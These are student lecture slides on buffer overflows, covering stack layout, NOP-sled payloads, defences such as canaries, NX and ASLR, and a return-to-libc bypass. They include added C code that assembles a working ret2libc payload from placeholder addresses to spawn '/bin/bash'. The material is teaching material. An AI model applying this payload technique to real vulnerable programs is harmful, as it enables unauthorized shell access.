
BUFFER OVERFLOW

Name: Majed Imad

Course: Operating Systems


Date: 17/12/2019
Definition

• From the word “overflow” we can deduce that a buffer overflow is a buffer that has been
filled with more data than it can hold.
• A buffer overflow occurs when more data is written to a buffer than it was sized for: the
excess spills into the adjacent memory and overwrites whatever was stored there (other
variables, the saved frame pointer, the return address), causing unpredictable results or crashes.
• Buffer overflows happen when the length of the input is not properly validated before it is
copied into the buffer.
Memory Layout Of A Process
Vulnerability

• Some programming languages are more susceptible to buffer overflow issues, such as C
and C++, because they do not bounds-check memory accesses for the programmer.
• Buffer overflow vulnerabilities can be difficult to find, and difficult to exploit reliably
once the protections described later are in place.
• The malicious extra data may contain code (shellcode) designed to trigger specific actions,
together with an address that redirects execution to that code.
• There are two primary types of buffer overflow vulnerabilities: stack overflow and heap
overflow.
How does it work?

[Diagram: the classic stack-smashing payload written into the buffer]

Without NOP-sled:   | Shellcode | Anything (fills up to the saved EBP) | Ptr |
With NOP-sled:      | NOP NOP ... NOP | Shellcode | Ptr |

Ptr lands on the saved return address and points back into the buffer. With the NOP-sled
the guess does not have to be exact: any address inside the sled slides execution forward
into the shellcode.

How To Prevent a Buffer Overflow?

• The developer must check the input length against the size of the destination buffer
before calling any function that might cause an overflow to happen.
• Avoid unsafe functions that can lead to a buffer overflow vulnerability:
sprintf, strcat, strcpy, and gets (gets has no way to limit the input at all). printf belongs
on the list for a different reason: passing untrusted data as the format string is a
format-string vulnerability, so always print such data through a fixed format like "%s".
• Protect against buffer overflows by compiling with stack canaries (the -fstack-protector
family in GCC and Clang): a random value is placed between the local buffers and the saved
return address and checked before the function returns.
How To Prevent a Buffer Overflow? (continued)

• OS- and toolchain-level mitigations:
- NX (non-executable memory): the stack and heap are mapped non-executable, so injected
shellcode cannot be run.
- ASLR (address space layout randomization): stack, heap and library addresses change on
every run, so the attacker cannot know in advance where the buffer or the libc functions are.
- Stack smashing protection (StackGuard, and its descendant -fstack-protector in GCC and
Clang): a compiler feature that detects the overwrite of the return address with a canary.
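The length check and the unsafe-function advice from the two slides above, as an added C example (this is not code from the original slides): the strcpy pattern the slides warn about, beside bounded versions that check the length first and report when input does not fit, plus the strncpy and printf pitfalls a practitioner should know. The inputs in main() are constructed for the demo, and NAME_MAX is an assumed buffer size.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX 16   /* assumed size of the destination buffer */

/* The unsafe pattern from the slide: no length check, strcpy into a fixed
 * buffer. Kept only for contrast; it is never called with oversized input. */
void greet_unsafe(const char *name) {
    char buf[NAME_MAX];
    strcpy(buf, name);            /* overflows buf if strlen(name) >= NAME_MAX */
    printf("Hello, %s\n", buf);
}

/* Length check first: copy only if src (with its terminator) fits in dst.
 * Returns 0 on success, -1 if the input is rejected. memchr is used instead
 * of strlen so that an unterminated src is never read past dst_size bytes. */
int copy_checked(char *dst, size_t dst_size, const char *src) {
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL) return -1;   /* no terminator within dst_size: too long */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* snprintf never overflows, but it silently truncates; its return value
 * (the length that would have been written) tells you when that happened.
 * Returns the number of characters written, or -1 on truncation/error. */
int format_checked(char *dst, size_t dst_size, const char *name) {
    int n = snprintf(dst, dst_size, "Hello, %s", name);
    if (n < 0 || (size_t)n >= dst_size) return -1;
    return n;
}

/* strncpy is not a fix on its own: when src is too long it fills dst
 * completely and leaves it unterminated. Returns 1 if dst ended up
 * terminated, 0 if not. */
int strncpy_is_terminated(char *dst, size_t dst_size, const char *src) {
    strncpy(dst, src, dst_size);
    return memchr(dst, '\0', dst_size) != NULL;
}

/* printf is only dangerous when untrusted data is used as the format string. */
void print_untrusted(const char *s) {
    printf("%s\n", s);            /* never printf(s) */
}

int main(void) {
    char buf[NAME_MAX];
    const char *ok  = "Majed";                            /* constructed input */
    const char *bad = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 32 bytes: too long */

    printf("copy_checked(ok)    = %d\n", copy_checked(buf, sizeof buf, ok));
    printf("copy_checked(bad)   = %d\n", copy_checked(buf, sizeof buf, bad));
    printf("format_checked(bad) = %d\n", format_checked(buf, sizeof buf, bad));
    printf("strncpy terminated? = %d\n", strncpy_is_terminated(buf, sizeof buf, bad));
    print_untrusted("%x %x %x");  /* printed literally, not interpreted */
    greet_unsafe(ok);             /* safe only because ok is known to fit */
    return 0;
}
```

The rule the slides give is the one the code follows: decide whether the input fits before any copy happens, and treat "did not fit" as an error rather than letting a library function decide silently.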
Exploiting despite the protection methods:

• Overwrite the saved return address (the value the PC is loaded with on return).
• With NX enabled, injected shellcode on the stack will not execute, so instead let the PC
point at code that already exists and can create a shell (“/bin/bash”).
• Point the PC into libc:
- The system() function is already there; called with “/bin/bash” as its argument it creates
the shell for us.
Exploiting despite the protection methods: Return to libc

Stack frame of the vulnerable function (32-bit) and the payload laid over it:

Buffer[80]   | saved EBP | return addr | (return for System) | Arg 1
80 Bytes     | 4 Bytes   | 4 Bytes     | 4 Bytes             | 4 Bytes
NOP / filler | anything  | Ptr1        | Ptr2                | Ptr3
             |           | System()    | Exit()              | “/bin/bash”

- Ptr1 replaces the return address, so the function's `ret` jumps straight into System().
- System() then sees the stack exactly as a normal call would have left it: Ptr2 is its
return address (Exit(), so the process ends cleanly instead of crashing after the shell
closes) and Ptr3 is its first argument, the address of a “/bin/bash” string in memory.
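The return-to-libc layout in the diagram above, built and decoded in C as an added example (not code from the original slides). The offsets are the ones the diagram gives (80 + 4 + 4 + 4 + 4); the libc and string addresses in main() are constructed placeholders, and a real run would take them from a debugger with ASLR disabled or defeated. The block also checks a practical pitfall the slides do not mention: a strcpy-driven overflow stops at the first NUL byte, so addresses containing 0x00 cannot be delivered this way.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame of the vulnerable function from the diagram (32-bit, cdecl):
 *   buf[80] | saved EBP | return address | return for system() | arg 1
 * Ptr1 -> system(), Ptr2 -> exit(), Ptr3 -> "/bin/bash" string. */
#define BUF_SIZE    80
#define OFF_EBP     (BUF_SIZE)        /* 80: saved EBP, any value will do */
#define OFF_RET     (BUF_SIZE + 4)    /* 84: Ptr1, replaces the return address */
#define OFF_SYSRET  (BUF_SIZE + 8)    /* 88: Ptr2, what system() will return to */
#define OFF_ARG1    (BUF_SIZE + 12)   /* 92: Ptr3, system()'s first argument */
#define PAYLOAD_LEN (BUF_SIZE + 16)   /* 96 bytes in total */

static void put32(uint8_t *p, uint32_t v) {      /* little-endian store */
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {        /* little-endian load */
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Builds the return-to-libc payload. No shellcode is injected, so NX does
 * not matter: every pointer targets code or data that already exists. */
size_t build_ret2libc(uint8_t *out, size_t cap,
                      uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr) {
    if (cap < PAYLOAD_LEN) return 0;
    memset(out, 0x90, BUF_SIZE);           /* filler; never executed */
    put32(out + OFF_EBP,    0x41414141u);  /* "anything" over the saved EBP */
    put32(out + OFF_RET,    system_addr);  /* Ptr1 */
    put32(out + OFF_SYSRET, exit_addr);    /* Ptr2 */
    put32(out + OFF_ARG1,   binsh_addr);   /* Ptr3 */
    return PAYLOAD_LEN;
}

/* What the CPU sees after the vulnerable function executes `ret`: it pops
 * Ptr1 and jumps to system(); system() then finds its own return address at
 * ESP and its first argument at ESP+4, exactly as a real call would have
 * left them. */
typedef struct { uint32_t callee, callee_ret, arg1; } chain_view;

chain_view interpret_chain(const uint8_t *payload) {
    chain_view v;
    v.callee     = get32(payload + OFF_RET);
    v.callee_ret = get32(payload + OFF_SYSRET);
    v.arg1       = get32(payload + OFF_ARG1);
    return v;
}

/* A strcpy-based overflow stops copying at the first NUL byte, so none of
 * the three pointers (or the EBP filler) may contain 0x00. Returns 1 if
 * the payload can be delivered intact, 0 otherwise. */
int chain_has_no_nul(const uint8_t *payload) {
    return memchr(payload + OFF_EBP, '\0', PAYLOAD_LEN - OFF_EBP) == NULL;
}

int main(void) {
    /* Assumed libc addresses (constructed placeholders, not real values). */
    uint32_t system_addr = 0xb7e4b3c0u;
    uint32_t exit_addr   = 0xb7e3f1a0u;
    uint32_t binsh_addr  = 0xbffff7e8u;   /* "/bin/bash" string already in memory */

    uint8_t payload[PAYLOAD_LEN];
    size_t n = build_ret2libc(payload, sizeof payload, system_addr, exit_addr, binsh_addr);
    chain_view v = interpret_chain(payload);
    printf("%zu bytes: ret -> 0x%08x (system), returns to 0x%08x (exit), "
           "arg1 = 0x%08x, NUL-free = %d\n",
           n, v.callee, v.callee_ret, v.arg1, chain_has_no_nul(payload));
    return 0;
}
```

Note why the order is System(), Exit(), "/bin/bash": the vulnerable function's `ret` consumes Ptr1, so from system()'s point of view the next word on the stack is its return address and the one after that is its argument; the diagram's RET / Arg 1 row is that calling-convention view. ASLR breaks this layout by moving libc and the stack on every run, which is why it is listed as a mitigation.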
Thank You
